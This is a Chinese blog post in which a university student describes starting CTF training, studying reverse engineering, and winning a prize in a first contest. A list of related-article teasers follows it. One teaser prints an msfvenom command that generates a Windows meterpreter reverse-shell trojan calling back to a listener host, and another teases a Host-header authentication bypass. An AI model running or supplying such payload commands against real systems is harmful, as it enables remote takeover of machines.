代码编织梦想

为什么选择CTF?

  • List 1

    博主今年大二,因为疫情在家度过了半年的时光,开学就懵逼的开始了大二的生活, 大一贪玩,没学多少东西,记得学了C语言刷了一些题什么的,大一下就是在家的那段日子屁都没学 (0.0),考试蒙混过关,于是那半年就荒废啦,在家感觉特别闲,闲到郁闷的那种,我就常常思考我以后该什么办,下定决心开学后要学点东西,不能再老打游戏了.

  • List 2

开学后在本科大群里面收到了网络安全实验室我们这个校区第一年成立,当时兴趣就来啦,虽然疫情在家什么都没学,我还是决定报名试一试,我这个人属于头铁的那一种;

  • List 3
  • 面试的时候给了我们三个方向,web,二进制,开发;出于对打比赛拿奖的那一种向往,我要在Web,二进制中二选一,我就在网上粗略的看了一下,我寥寥草草的选择了二进制方向,后来才知道选Web的有二十多个人,而我们这刚开始只有3个人(知道后我当然就惊啦,又懵逼了,还好后面有进来2个女生,瞬间就好起来了0.0, 接下来希望能来点小学弟嘿嘿~);后来我才知道二进制入门比WEb难,过程也更枯燥,妈呀,这是啥呀??但我还是决定头铁下去,因为我相信坚持下去应该会有所收获的!

在这里插入图片描述

奇妙的学习过程

我觉得上大学最主要的好处是学校会为你提供一些学习资源供你学习,而这个实验室就是学校为我们所提供的学习资源,这里有一些大佬为我们解答,打包好的学习资源,学习路线,有一起配陪你学习的同学,专门的教室,辅导老师,这让我感觉很棒~
但是我们这个校区实验室由于是第一年成立,我们刚开始三个人,学的有点艰难 -.-,有点蒙着眼睛过河的感觉,好多东西都要靠我们自己整,上网查信息(说多了都是泪),比如装软件装一天,学习有点迷茫缺少指导什么的;
刚开始看了半个月的汇编吧,之后就去攻防世界做题去了,刚开始本来要做pwn的,由于太难了直接劝退…,之后做了写Reverse的题感觉还不错就慢慢的学了;
在这里插入图片描述

第一场比赛

  • List 1
  • 前几天打了一场比赛是好几所大学联合办的,有哈工大(威海),西南民族,湘谭大学等,是一场针对大一,大二的比赛,梯度明显,比较友好,刚开始收到要打比赛的消息时,我内心很懵逼,什么?才学一个月让我打比赛?本来想下学期再打比赛呢!
    比赛终于开始了,周六那天我早早的起来做题了(有点激动0.0)
  • List 2
  • 打开Reverse放进IDA果然果然看不懂一脸懵,就就去看Misc了,做着发现Misc挺好得分的哈,接下来就一直研究Misc去了;
  • List 3
  • 直到比赛结束一到REverse的题也没写出来,后来看了别人写的WP,感觉挺简单友好的,害!看来我还需要努力阿; 哼哼~我misc最后砍了以前多分还做出来一道web,感觉挺可耻的阿,二进制的题都没做出来 -.-
  • list 4
  • 比赛结束了,总排名40多,校排名10;感觉挺开心的.得了一个二等奖,是我大学生涯第一个奖,第一个证书,我也会继续努力的;
  • 在这里插入图片描述

比赛中的小插曲

  • list 1
  • 第一次打比赛,我就去别的CTF群里面把题目发过去问题去了 -.-, 后果可想而知,被逮到了,被教育了一顿…我也积极认错了哈,怪我不懂规矩;
  • list 2
  • 后来我在网上偶尔查到在CTF个大赛上都有问思路,要flag的现象,由于荣誉和奖金已经成为了一种病态现象,看来我们要提升自己的能力之外还需要找到一种"合情合理"的门路;-

比赛后的震惊

  • list 1
  • 比赛后两天,也就是今天,刚安稳的学习不久,指导老师让我们加他微信,之后把我们拉入了一个群,告诉了我们一个消息,学校和一个省内名校联合做一个项目让我们参与,纳尼??学了一个月让我参加项目?当时我又惊又喜!事情好像越来越有趣了!
    现在才知道这个项目的大致意思,看来要学习的东西还有很多呢;也很感谢学校为我们提供的一些资源和平台!!
    在这里插入图片描述

感受

  • list 1
    - 打CTF,我也不知道我的选择是对是错,以后可能会从事网安方面的工作,也不知网安是当下时代的又一风口,还是一个坑;但我会慢慢走下去的,加油!
    在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_45556441/article/details/110450226

Kali Linux基础操作学习篇——cp命令(二)-爱代码爱编程

一、课程背景 相较通过图形界面执行计算机命令,使用命令行模式执行相应操作,能够更好地节约计算机资源,迅速提升计算机运行效力。Kali Linux命令如同中文的拼音,英文的单词,虽然学习过程可能繁杂枯燥,但它是一切学习的基础,是决定最终学习高度的基石。无论今后是否进入计算机领域工作,熟练掌握Linux相关命令,都将有助于提升您的工作效率、工资薪金。 二、课

Kali Linux基础操作学习篇——cp命令(一)-爱代码爱编程

课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、课程背景 相较通过图形界面执行计算机命令,使用命令行模式执行相应操作,能够更好地节约计算机资源,迅速提升计算机运行效力。Kali Linux命令如同中文的拼音,英文的单词,虽然学习

Kali Linux基础操作学习篇——mv-爱代码爱编程

课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、课程背景 相较通过图形界面执行计算机命令,使用命令行模式执行相应操作,能够更好地节约计算机资源,迅速提升计算机运行效力。Kali Linux命令如同中文的拼音,英文的单词,虽然学习

运用IP代理技术来保护自身网络安全-爱代码爱编程

互联网的快速发展让工作学习乃至生活都发生了翻天覆地的变化,获取信息的途径也得到了进一步提升,现在可以通过网络快速地来获取到自己想要的信息,但与此同时我们也要更加注意个人信息安全的保护,而使用IP代理保护自身网络安全则是现如今最简单稳定的方法。 用户在每次连接IP海IP代理的时候,联网设备的IP地址都会随之发生变化,这些IP都来自代理IP,不是用户的真实IP

msf中收到了sessions却不反弹meterpreter的原因-爱代码爱编程

msf中收到了sessions却不反弹meterpreter的原因 问题描述: 生成木马 ​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.189.130 lport=12346 -f exe >/hack.exe

Web渗透测试之HTTP头部注入:Host实现身份验证绕过-爱代码爱编程

文章目录 前言题目分析总结 前言   本篇将讲解在Host参数存在注入漏洞时,如何利用burpsuite修改Host参数实现身份验证绕过并达到我们想要的目的。 题目分析 题目页面如下:   既然要利用Host参数实现注入操作,那么就必须得先确认Host是否存在可注入漏洞。有时为了防止服务器收到无法识别的域名请求,会将服务器配置为后备选项。